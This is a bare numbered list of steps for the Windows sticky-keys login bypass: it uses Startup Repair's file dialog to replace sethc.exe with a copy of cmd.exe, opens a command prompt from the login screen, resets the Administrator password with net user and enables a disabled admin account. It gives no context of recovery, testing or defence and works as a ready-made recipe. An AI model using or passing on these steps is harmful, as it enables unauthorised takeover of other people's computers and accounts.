1. Launch startup repair
2. Do not restore
3. Startup repair popup box, hit view problem details
4. Click on last local file link.
5. File > open > local disk > windows > (allfiles) > system32
6. Copy and paste a cmd.exe copy
7. Rename sethc to anything
8. Rename cmd.exe-copy to sethc
9. Restart computer
10. Press shift 5 times
11. Type explorer.exe
12. Type net users
13. Type net localgroup Administrators
14. Type net user Administrator * (changes account password)
15. Enter pass
16. Repeat pass

(to enable a disabled admin account)
17. Type net user Administrator /Active:yes
